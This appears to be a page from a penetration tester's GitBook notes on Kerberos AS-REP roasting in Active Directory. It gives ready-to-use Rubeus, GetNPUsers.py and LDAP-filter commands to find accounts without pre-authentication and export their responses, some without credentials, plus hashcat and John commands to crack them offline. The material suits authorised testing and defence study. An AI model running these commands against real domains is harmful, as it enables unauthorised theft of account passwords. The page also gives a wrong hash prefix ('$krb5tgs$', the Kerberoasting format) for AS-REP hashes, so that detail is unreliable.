InfoSec Notes
  • InfoSec Notes
  • General
    • External recon
    • Ports scan
    • Bind / reverse shells
    • File transfer / exfiltration
    • Pivoting
    • Passwords cracking
  • Active Directory
    • Recon - Domain Recon
    • Recon - AD scanners
    • Exploitation - NTLM capture and relay
    • Exploitation - Password spraying
    • Exploitation - Domain Controllers CVE
    • Exploitation - Kerberos AS_REP roasting
    • Exploitation - Credentials theft shuffling
    • Exploitation - GPP and shares searching
    • Exploitation - Kerberos Kerberoasting
    • Exploitation - ACL exploiting
    • Exploitation - GPO users rights
    • Exploitation - Active Directory Certificate Services
    • Exploitation - Kerberos tickets usage
    • Exploitation - Kerberos silver tickets
    • Exploitation - Kerberos delegations
    • Exploitation - gMS accounts (gMSAs)
    • Exploitation - Azure AD Connect
    • Exploitation - Operators to Domain Admins
    • Post Exploitation - ntds.dit dumping
    • Post Exploitation - Kerberos golden tickets
    • Post Exploitation - Trusts hopping
    • Post Exploitation - Persistence
  • L7
    • Methodology
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 111 / 2049 - NFS
    • 113 - Ident
    • 135 - MSRPC
    • 137-139 - NetBIOS
    • 161 - SNMP
    • 389 / 3268 - LDAP
    • 445 - SMB
    • 512 / 513 - REXEC / RLOGIN
    • 554 - RTSP
    • 1099 - JavaRMI
    • 1433 - MSSQL
    • 1521 - ORACLE_DB
    • 3128 - Proxy
    • 3306 - MySQL
    • 3389 - RDP
    • 5985 / 5986 - WSMan
    • 8000 - JDWP
    • 9100 - Printers
    • 11211 - memcached
    • 27017 / 27018 - MongoDB
  • Windows
    • Shellcode and PE loader
    • Bypass PowerShell ConstrainedLanguageMode
    • Bypass AppLocker
    • Local privilege escalation
    • Post exploitation
      • Credentials dumping
      • Defense evasion
      • Local persistence
    • Lateral movements
      • Local credentials re-use
      • Over SMB
      • Over WinRM
      • Over WMI
      • Over DCOM
      • CrackMapExec
  • Linux
    • Local privilege escalation
    • Post exploitation
  • DFIR
    • Common
      • Image acquisition and mounting
      • Memory forensics
      • Web logs analysis
      • Browsers forensics
      • Email forensics
      • Docker forensics
    • Windows
      • Artefacts overview
        • Amcache
        • EVTX
        • Jumplist
        • LNKFile
        • MFT
        • Outlook_files
        • Prefetch
        • RecentFilecache
        • RecycleBin
        • Shellbags
        • Shimcache
        • SRUM
        • Timestamps
        • User Access Logging (UAL)
        • UsnJrnl
        • Miscellaneous
      • TTPs analysis
        • Accounts usage
        • Local persistence
        • Lateral movement
        • PowerShell activity
        • Program execution
        • Timestomping
        • EVTX integrity
        • System uptime
        • ActiveDirectory replication metadata
        • ActiveDirectory persistence
    • Linux
      • Artefacts overview
      • TTPs analysis
        • Timestomping
    • Cloud
      • Azure
      • AWS
    • Tools
      • Velociraptor
      • KAPE
      • Dissect
      • plaso
      • Splunk usage
  • Red Team specifics
    • Phishing - Office Documents
    • OpSec Operating Systems environment
    • EDR bypass with EDRSandBlast
    • Cobalt Strike
  • Web applications
    • Recon - Server exposure
    • Recon - Hostnames discovery
    • Recon - Application mapping
    • Recon - Attack surface overview
    • CMS & softwares
      • ColdFusion
      • DotNetNuke
      • Jenkins
      • Jira
      • Ovidentia
      • WordPress
      • WebDAV
    • Exploitation - Overview
    • Exploitation - Authentication
    • Exploitation - LDAP injections
    • Exploitation - Local and remote file inclusions
    • Exploitation - File upload
    • Exploitation - SQL injections
      • SQLMAP.md
      • MSSQL.md
      • MySQL.md
      • SQLite.md
    • Exploitation - NoSQL injections
      • NoSQLMap.md
      • mongoDB.md
    • Exploitation - GraphQL
  • Binary exploitation
    • Linux - ELF64 ROP leaks
    • (Very) Basic reverse
  • Android
    • Basic static analysis
  • Miscellaneous
    • Regex 101
    • WinDbg Kernel
    • Basic coverage guided fuzzing
Powered by GitBook
On this page
  • Overview
  • Automated DONT_REQ_PREAUTH user accounts discovery and export of AS-REP responses
  • DONT_REQ_PREAUTH user accounts discovery
  • Request and export of KRB_AS_REP responses
  • Offline cracking of KRB_AS_REP responses
  • References
  1. Active Directory

Exploitation - Kerberos AS_REP roasting

Overview

An ASP_REP roasting attack is an attack on the Kerberos authentication protocol that involves compromising the password of an user account that do not require Kerberos pre-authentication.

The attack is based on the fact that the KRB_AS_REP response, in reply from the KDC (Key Distribution Center) for an initial authentication request KRB_AS_REQ to the Authentication Service (AS), contains ciphertext encrypted using the client's secret key.

By default, the KRB_AS_REQ must include a timestamp encrypted with the client's secret key, in order to permit the verification of the user identity before the KDC returns a KRB_AS_REP response. This verification is omitted for user accounts that do not require Kerberos pre-authentication, i.e accounts with the account property DONT_REQ_PREAUTH. These user accounts secrets are exposed to offline cracking, against the ciphertext, attack that are much faster and can not be time restricted.

Automated DONT_REQ_PREAUTH user accounts discovery and export of AS-REP responses

The following tools can be used to automate the discovery of user accounts that do not require Kerberos pre-authentication and the request and export of KRB_AS_REQ response for offline cracking.

In order to enumerate the domain user accounts, Rubeus / GetNPUsers.py must be started in a domain authenticated security context or provided with working domain credentials.

Rubeus.exe asreproast /outfile:<FILE>
Rubeus.exe asreproast /format:john /outfile:<FILE>

Rubeus.exe asreproast /creduser:'<DOMAIN_FQDN>\<USERNAME>' /credpassword:'<PASSWORD>' /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /outfile:<FILE_PATH>

# Will attempt to request a TGT for all users.
GetNPUsers.py -request <DOMAIN>/<USERNAME>[:<PASSWORD>]

DONT_REQ_PREAUTH user accounts discovery

The following tools can be used to discover user accounts that do not require Kerberos pre-authentication:

Get-ADUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-ADUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"

Get-NetUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-NetUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"

Request and export of KRB_AS_REP responses

The following tools can be used to request and export KRB_AS_REP for user accounts that do not require Kerberos pre-authentication.

The following operations do not require the knowledge of valid credentials.

Rubeus.exe asreproast /user:<USERNAME> /outfile:<FILE>
Rubeus.exe asreproast /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /user:<USERNAME> /outfile:<FILE>

GetNPUsers.py '<DOMAIN>/' -usersfile <USERNAMES_FILE>
GetNPUsers.py '<DOMAIN>/' -dc-ip <DC_HOSTNAME | DC_IP> -usersfile <USERNAMES_FILE> -format john

Offline cracking of KRB_AS_REP responses

Both John the Ripper (magnumripper fork) and hashcat can be used to crack the KRB_AS_REP responses.

The hash needs to respect the following format to be recognized hashcat:

# ENCRYPTION_TYPE 23 = RC4
# ENCRYPTION_TYPE 17 = AES128
# ENCRYPTION_TYPE 18 = AES256

$krb5tgs$<ENCRYPTION_TYPE>$*<USERNAME>@<DOMAIN>:$85DA[...]

Depending on the tool used, the hash retrieved may need to be manually updated.

The following commands can be used to crack the KRB_AS_REP responses:

# Its recommended to use Hashcat on a Windows OS for better performance due to driver compatibility
hashcat64.exe -m 18200 -a 0 [-r <RULE_FILE>] '[<HASH> | <HASHFILE>]' <WORDLIST>

john --wordlist=<WORDLIST> <HASHFILE>

References

https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ https://tools.ietf.org/html/rfc4120#page-60 https://beta.hackndo.com/kerberos-asrep-roasting/ https://adsecurity.org/?p=227

PreviousExploitation - Domain Controllers CVENextExploitation - Credentials theft shuffling

Last updated 3 years ago